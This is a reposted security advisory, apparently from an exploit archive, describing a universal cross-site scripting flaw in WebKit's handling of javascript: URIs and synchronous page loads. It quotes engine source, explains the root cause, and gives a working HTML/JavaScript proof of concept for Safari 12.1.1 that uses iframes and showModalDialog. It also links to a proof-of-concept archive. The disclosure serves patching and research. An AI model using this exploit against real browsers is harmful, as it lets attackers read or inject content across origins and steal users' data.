webkit uxss using javascript: uri and synchronous page loads

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webkit uxss using javascript: uri and synchronous page loads Code Code...
VULNERABILITY DETAILS ``` void DocumentWriter::replaceDocument(const String& source, Document* ownerDocument) { [...] begin(m_frame->document()->url(), true, ownerDocument); // ***1*** // begin() might fire an unload event, which will result in a situation where no new document has been attached, // and the old document has been detached. Therefore, bail out if no document is attached. if (!m_frame->document()) return; if (!source.isNull()) { if (!m_hasReceivedSomeData) { m_hasReceivedSomeData = true; m_frame->document()->setCompatibilityMode(DocumentCompatibilityMode::NoQuirksMode); } // FIXME: This should call DocumentParser::appendBytes instead of append // to support RawDataDocumentParsers. if (DocumentParser* parser = m_frame->document()->parser()) parser->append(source.impl()); // ***2*** } ``` ``` bool DocumentWriter::begin(const URL& urlReference, bool dispatch, Document* ownerDocument) { [...] bool shouldReuseDefaultView = m_frame->loader().stateMachine().isDisplayingInitialEmptyDocument() && m_frame->document()->isSecureTransitionTo(url); // ***3*** if (shouldReuseDefaultView) document->takeDOMWindowFrom(*m_frame->document()); else document->createDOMWindow(); // Per <http://www.w3.org/TR/upgrade-insecure-requests/>, we need to retain an ongoing set of upgraded // requests in new navigation contexts. Although this information is present when we construct the // Document object, it is discard in the subsequent 'clear' statements below. So, we must capture it // so we can restore it. HashSet<SecurityOriginData> insecureNavigationRequestsToUpgrade; if (auto* existingDocument = m_frame->document()) insecureNavigationRequestsToUpgrade = existingDocument->contentSecurityPolicy()->takeNavigationRequestsToUpgrade(); m_frame->loader().clear(document.ptr(), !shouldReuseDefaultView, !shouldReuseDefaultView); clear(); // m_frame->loader().clear() might fire unload event which could remove the view of the document. // Bail out if document has no view. if (!document->view()) return false; if (!shouldReuseDefaultView) m_frame->script().updatePlatformScriptObjects(); m_frame->loader().setOutgoingReferrer(url); m_frame->setDocument(document.copyRef()); [...] m_frame->loader().didBeginDocument(dispatch); // ***4*** document->implicitOpen(); [...] ``` `DocumentWriter::replaceDocument` is responsible for replacing the currently displayed document with a new one using the result of evaluating a javascript: URI as the document's source. The method calls `DocumentWriter::begin`[1], which might trigger JavaScript execution, and then sends data to the parser of the active document[2]. If an attacker can perform another page load right before returning from `begin` , the method will append an attacker-controlled string to a potentially cross-origin document. Under normal conditions, a javascript: URI load always makes `begin` associate the new document with a new DOMWindow object. However, it's actually possible to meet the requirements of the `shouldReuseDefaultView` check[3]. Firstly, the attacker needs to initialize the <iframe> element's source URI to a sane value before it's inserted into the document. This will set the frame state to `DisplayingInitialEmptyDocumentPostCommit`. Then she has to call `open` on the frame's document right after the insertion to stop the initial load and set the document URL to a value that can pass the `isSecureTransitionTo` check. When the window object is re-used, all event handlers defined for the window remain active. So, for example, when `didBeginDocument`[4] calls `setReadyState` on the new document, it will trigger the window's "readystatechange" handler. Since `NavigationDisabler` is not active at this point, it's possible to perform a synchronous page load using the `showModalDialog` trick. VERSION WebKit revision 246194 Safari version 12.1.1 (14607. REPRODUCTION CASE The attack won't work if the cross-origin document has no active parser by the time `begin` returns. The easiest way to reproduce the bug is to call `document.write` from the victim page when the main parsing task is complete. However, it's a rather artificial construct, so I've also attached another test case, which works for regular pages, but it has to use a python script that emulates a slow web server to run reliably. ``` <body> <h1>Click to start</h1> <script> function createURL(data, type = 'text/html') { return URL.createObjectURL(new Blob([data], {type: type})); } function waitForLoad() { showModalDialog(createURL(` <script> let it = setInterval(() => { try { opener.frame.contentDocument.x; } catch (e) { clearInterval(it); window.close(); } }, 2000); </scrip` + 't>')); } window.onclick = () => { frame = document.createElement('iframe'); frame.src = location; document.body.appendChild(frame); frame.contentDocument.open(); frame.contentDocument.onreadystatechange = () => { frame.contentWindow.addEventListener('readystatechange', () => { a = frame.contentDocument.createElement('a'); a.href = victim_url; a.click(); waitForLoad(); }, {capture: true, once: true}); } frame.src = 'javascript:"<script>alert(document.documentElement.outerHTML)</scr' + 'ipt>"'; } victim_url = 'data:text/html,<script>setTimeout(() => document.write("secret data"), 1000)</scr' + 'ipt>'; ext = document.body.appendChild(document.createElement('iframe')); ext.src = victim_url; </script> </body> ``` CREDIT INFORMATION Sergei Glazunov of Google Project Zero Proof of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47450.zip

Webkit uxss using javascript: uri and synchronous page loads Vulnerability / Exploit Source : Webkit uxss using javascript: uri and synchronous page loads

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